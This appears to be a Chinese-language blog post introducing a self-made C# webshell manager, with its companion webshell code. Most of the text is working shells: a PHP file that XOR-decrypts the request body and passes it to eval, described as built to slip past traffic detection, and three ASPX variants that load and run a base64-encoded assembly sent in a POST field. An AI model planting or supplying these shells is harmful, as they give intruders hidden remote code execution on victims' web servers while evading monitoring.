C# 个人版webshell管理工具

主要功能

1. 已完成 aspx，php 虚拟终端，文件管理，增删改查，文件上传
2. HTTP代理
3. 更新内容：php xor+base64加密，aspx base64加密

php

参考冰蝎实现xor+base64流量加密，更好绕过流量检测

webshell

<?php
function Decrypt($data)
{
    
    
   $key="e45e329feb5d925b";
   $bs="base64_"."decode";
 $after=$bs($data."");
 for($i=0;$i<strlen($after);$i++) {
    
    
     $after[$i] = $after[$i]^$key[$i+1&15];
  }
   return $after;
}
eval(Decrypt(file_get_contents("php://input")));
?>

aspx

参考AntSword-Csharp-Template 中国蚁剑Csharp一句话Payload

https://github.com/AntSwordProject/AntSword-Csharp-Template

shell.aspx

为了兼容各种情况下的内存马，Equals中的入口参数可以为System.Web.HttpContext对象，或者包含Request与Response对象的数组。

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
    
    
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(Context);
  }
%>

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
    
    
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(new object[] {
    
     Request, Response });
  }
%>

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
    
    
      System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
      assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
  }
%>

加密效果

代码写的不是很好，主要是用C#造轮子，来锻炼编程能力

开源地址：

https://github.com/wy876/tools